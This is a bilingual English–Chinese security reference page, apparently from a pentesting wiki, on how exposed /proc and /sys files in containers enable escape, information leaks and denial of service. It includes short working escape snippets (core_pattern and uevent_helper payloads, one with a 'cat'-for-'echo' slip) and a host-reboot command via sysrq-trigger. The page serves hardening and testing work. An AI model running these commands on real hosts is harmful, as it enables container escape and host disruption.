Sensitive Mounts  敏感挂载

Due to the lack of namespace support, the exposure of /proc and /sys offers a source of significant attack surface and information disclosure. Numerous files within the procfs and sysfs offer a risk for container escape, host modification or basic information disclosure which could facilitate other attacks.
由于缺乏命名空间支持, /proc/sys 的暴露提供了显著的攻击面和信息泄露来源。 procfssysfs 中的许多文件存在容器逃逸、主机修改或基本信息泄露的风险,这可能有助于其他攻击。

procfs

/proc/sys

/proc/sys typically allows access to modify kernel variables, often controlled through sysctl(2).
/proc/sys 通常允许访问修改内核变量,通常通过 sysctl(2) 控制。

/proc/sys/kernel/core_pattern

/proc/sys/kernel/core_pattern defines a program which is executed on core-file generation (typically a program crash) and is passed the core file as standard input if the first character of this file is a pipe symbol |. This program is run by the root user and will allow up to 128 bytes of command line arguments. This would allow trivial code execution within the container host given any crash and core file generation (which can be simply discarded during a myriad of malicious actions).
/proc/sys/kernel/core_pattern 定义了一个在生成核心文件(通常是一个程序崩溃)时执行的程序,如果该文件的第一字符是管道符号 | ,则会将核心文件作为标准输入传递给该程序。该程序由 root 用户运行,并允许最多 128 字节的命令行参数。这会在容器主机中允许任何崩溃和核心文件生成(这些核心文件可以在许多恶意操作中简单地被丢弃),从而实现简单的代码执行。

$ cd /proc/sys/kernel
$ echo "|$overlay/shell.sh" > core_pattern
$ sleep 5 && ./crash &

References:  参考文献:

/proc/sys/kernel/modprobe

/proc/sys/kernel/modprobe contains the path to the kernel module loader, which is called when loading a kernel module such as via the modprobe command. Code execution can be gained by performing any action which will trigger the kernel to attempt to load a kernel module (such as using the crypto-API to load a currently unloaded crypto-module, or using ifconfig to load a networking module for a device not currently used).
/proc/sys/kernel/modprobe 包含内核模块加载器的路径,该加载器在加载内核模块时被调用,例如通过 modprobe 命令。通过执行任何会触发内核尝试加载内核模块的操作(例如使用 crypto-API 加载当前未加载的 crypto 模块,或使用 ifconfig 为当前未使用的设备加载网络模块),可以获得代码执行权限。

/proc/sys/vm/panic_on_oom

/proc/sys/vm/panic_on_oom is a global flag that determines whether the kernel will panic when an Out of Memory (OOM) condition is hit (rather than invoking the OOM killer). This is more of a Denial of Service (DoS) attack than container escape, but it no less exposes an ability which should only be available to the host
/proc/sys/vm/panic_on_oom 是一个全局标志,用于确定当系统发生内存不足(OOM)情况时,内核是否会崩溃(而不是调用 OOM 杀手)。这更像是一种拒绝服务(DoS)攻击,而不是容器逃逸,但它同样暴露了一个只应主机才能使用的功能

/proc/sys/fs

/proc/sys/fs directory contains an array of options and information concerning various aspects of the file system, including quota, file handle, inode, and dentry information. Write access to this directory would allow various denial-of-service attacks against the host.
/proc/sys/fs 目录包含了一系列关于文件系统各个方面的选项和信息,包括配额、文件句柄、inode 和 dentry 信息。对该目录的写访问将允许对主机进行各种拒绝服务攻击。

/proc/sys/fs/binfmt_misc

/proc/sys/fs/binfmt_misc allows executing miscellaneous binary formats, which typically means various interpreters can be registered for non-native binary formats (such as Java) based on their magic number. While this path is typically writable by AppArmor rules, NCC is not aware of any exploits, although it is not likely required for most container applications.
/proc/sys/fs/binfmt_misc 允许执行多种二进制格式,通常意味着可以根据其魔数注册各种解释器来处理非原生二进制格式(如 Java)。尽管这条路径通常可被 AppArmor 规则写入,但 NCC 并未发现任何利用方式,尽管对于大多数容器应用程序来说,这很可能是不必要的。

/proc/config.gz

/proc/config.gz depending on CONFIG_IKCONFIG_PROC settings, this exposes a compressed version of the kernel configuration options for the running kernel. This may allow a compromised or malicious container to easily discover and target vulnerable areas enabled in the kernel.
/proc/config.gz 根据设置,这会暴露运行内核的压缩版内核配置选项。这可能允许被篡改或恶意的容器轻易发现并针对内核中启用的漏洞区域。

/proc/sysrq-trigger

Sysrq is an old mechanism which can be invoked via a special SysRq keyboard combination. This can allow an immediate reboot of the system, issue of sync(2), remounting all filesystems as read-only, invoking kernel debuggers, and other operations.
Sysrq 是一种旧机制,可以通过特殊的 SysRq 键盘组合触发。这可以立即重启系统、发出 sync(2) 命令、将所有文件系统重新挂载为只读、调用内核调试器以及其他操作。

If the guest is not properly isolated, it can trigger the sysrq commands by writing characters to /proc/sysrq-trigger file.
如果客机没有被适当隔离,可以通过向 /proc/sysrq-trigger 文件写入字符来触发 sysrq 命令。

# Reboot the host
echo b > /proc/sysrq-trigger

/proc/kmsg

/proc/kmsg can expose kernel ring buffer messages typically accessed via dmesg. Exposure of this information can aid in kernel exploits, trigger kernel address leaks (which could be used to help defeat the kernel Address Space Layout Randomization (KASLR)), and be a source of general information disclosure about the kernel, hardware, blocked packets and other system details.
/proc/kmsg 可以暴露内核环形缓冲区消息,通常通过 dmesg 访问。暴露这些信息有助于内核利用,触发内核地址泄露(这可能被用来帮助绕过内核地址空间布局随机化(KASLR)),并成为内核、硬件、受阻数据包和其他系统详细信息的一般信息泄露来源。

/proc/kallsyms

/proc/kallsyms contains a list of kernel exported symbols and their address locations for dynamic and loadable modules. This also includes the location of the kernel's image in physical memory, which is helpful for kernel exploit development. From these locations, the base address or offset of the kernel can be located, which can be used to overcome kernel Address Space Layout Randomization (KASLR).
/proc/kallsyms 包含内核导出符号及其地址位置列表,适用于动态和可加载模块。这也包括内核映像在物理内存中的位置,这对内核利用开发很有帮助。从这些位置可以找到内核的基地址或偏移量,这可以用来克服内核地址空间布局随机化(KASLR)。

For systems with kptr_restrict set to 1 or 2, this file will exist but not provide any address information (although the order in which the symbols are listed is identical to the order in memory).
对于 kptr_restrict 设置为 12 的系统,此文件将存在但不提供任何地址信息(尽管符号的列表顺序与内存中的顺序相同)。

/proc/[pid]/mem

/proc/[pid]/mem exposes interfaces to the kernel memory device /dev/mem. While the PID Namespace may protect from some attacks via this procfs vector, this area of has been historically vulnerable, then thought safe and again found to be vulnerable for privilege escalation.
/proc/[pid]/mem 向内核内存设备 /dev/mem 提供接口。虽然 PID 命名空间可能通过此 procfs 向量保护某些攻击,但该区域历史上曾存在漏洞,曾被认为是安全的,然后再次被发现存在特权提升漏洞。

/proc/kcore

/proc/kcore represents the physical memory of the system and is in an ELF core format (typically found in core dump files). It does not allow writing to said memory. The ability to read this file (restricted to privileged users) can leak memory contents from the host system and other containers.
/proc/kcore 代表系统的物理内存,并以 ELF 核心格式(通常在核心转储文件中找到)表示。它不允许写入该内存。读取此文件的能力(仅限于特权用户)可能会泄露主机系统和其他容器的内存内容。

The large reported file size represents the maximum amount of physically addressable memory for the architecture, and can cause problems when reading it (or crashes depending on the fragility of the software).
报告的较大文件大小代表了该架构可物理寻址的最大内存量,在读取它时可能会出现问题(或根据软件的脆弱性导致崩溃)。

Dumping /proc/kcore in 2019
转储 /proc/kcore 在 2019 年

/proc/kmem

/proc/kmem is an alternate interface for /dev/kmem (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing kernel virtual memory. It allows both reading and writing, allowing direct modification of kernel memory.
/proc/kmem 是 /dev/kmem 的一个备用接口(直接访问被 cgroup 设备白名单阻止),它是一个字符设备文件,代表内核虚拟内存。它允许读写,从而可以直接修改内核内存。

/proc/mem

/proc/mem is an alternate interface for /dev/mem (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing physical memory of the system. It allows both reading and writing, allowing modification of all memory. (It requires slightly more finesse than kmem, as virtual addresses need to be resolved to physical addresses first).
/proc/mem 是 /dev/mem 的一个备用接口(直接访问被 cgroup 设备白名单阻止),它是一个字符设备文件,代表系统的物理内存。它允许读写,从而可以修改所有内存。(它比 kmem 需要稍微多一些技巧,因为虚拟地址需要先解析为物理地址)。

/proc/sched_debug

/proc/sched_debug is a special file returns process scheduling information for the entire system. This information includes process names and process IDs from all namespaces in addition to process cgroup identifiers. This effectively bypasses the PID namespace protections and is other/world readable, so it can be exploited in unprivileged containers as well.
/proc/sched_debug 是一个特殊文件,返回整个系统的进程调度信息。这些信息包括所有命名空间中的进程名称和进程 ID,以及进程 cgroup 标识符。这实际上绕过了 PID 命名空间保护,并且是其他/世界可读的,因此它也可以在无特权的容器中被利用。

/proc/[pid]/mountinfo

/proc/[pid]/mountinfo contains information about mount points in the process's mount namespace. It exposes the location of the container rootfs or image.
/proc/[pid]/mountinfo 包含进程的挂载命名空间中挂载点的信息。它暴露了容器 rootfs 或镜像的位置。

sysfs

/sys/kernel/uevent_helper

uevents are events triggered by the kernel when a device is added or removed. Notably, the path for the uevent_helper can be modified by writing to /sys/kernel/uevent_helper. Then, when a uevent is triggered (which can also be done from userland by writing to files such as /sys/class/mem/null/uevent), the malicious uevent_helper gets executed.
uevents 是内核在设备添加或移除时触发的事件。值得注意的是, uevent_helper 的路径可以通过写入 /sys/kernel/uevent_helper 来修改。然后,当 uevent 被触发时(这也可以通过写入用户空间的文件如 /sys/class/mem/null/uevent 来完成),恶意 uevent_helper 就会被执行。

# Creates a payload
cat "#!/bin/sh" > /evil-helper
cat "ps > /output" >> /evil-helper
chmod +x /evil-helper
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets uevent_helper to /path/payload
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
# Triggers a uevent
echo change > /sys/class/mem/null/uevent
# or else
# echo /sbin/poweroff > /sys/kernel/uevent_helper
# Reads the output
cat /output

/sys/class/thermal

Access to ACPI and various hardware settings for temperature control, typically found in laptops or gaming motherboards. This may allow for DoS attacks against the container host, which may even lead to physical damage.
访问 ACPI 和各种硬件设置以进行温度控制,通常在笔记本电脑或游戏主板上找到。这可能允许对容器主机发起 DoS 攻击,甚至可能导致物理损坏。

/sys/kernel/vmcoreinfo

This file can leak kernel addresses which could be used to defeat KASLR.
该文件可能会泄露内核地址,这些地址可能被用来绕过 KASLR。

/sys/kernel/security

In /sys/kernel/security mounted the securityfs interface, which allows configuration of Linux Security Modules. This allows configuration of AppArmor policies, and so access to this may allow a container to disable its MAC system.
/sys/kernel/security 中挂载的 securityfs 接口,允许配置 Linux 安全模块。这允许配置 AppArmor 策略,因此访问此接口可能允许容器禁用其 MAC 系统。

/sys/firmware/efi/vars

/sys/firmware/efi/vars exposes interfaces for interacting with EFI variables in NVRAM. While this is not typically relevant for most servers, EFI is becoming more and more popular. Permission weaknesses have even lead to some bricked laptops.
/sys/firmware/efi/vars 暴露了与 NVRAM 中的 EFI 变量交互的接口。虽然这通常对大多数服务器不相关,但 EFI 正变得越来越流行。权限弱点甚至导致了一些笔记本电脑变砖。

/sys/firmware/efi/efivars

/sys/firmware/efi/efivars provides an interface to write to the NVRAM used for UEFI boot arguments. Modifying them can render the host machine unbootable.
/sys/firmware/efi/efivars 提供了一个写入 UEFI 启动参数所使用的 NVRAM 的接口。修改它们可能会导致主机无法启动。

/sys/kernel/debug

debugfs provides a "no rules" interface by which the kernel (or kernel modules) can create debugging interfaces accessible to userland. It has had a number of security issues in the past, and the "no rules" guidelines behind the filesystem have often clashed with security constraints.
debugfs 提供了一个“无规则”的接口,通过该接口,内核(或内核模块)可以创建用户空间可访问的调试接口。它在过去曾存在许多安全问题,并且文件系统的“无规则”指南经常与安全约束相冲突。

References  参考文献

Last updated   最后更新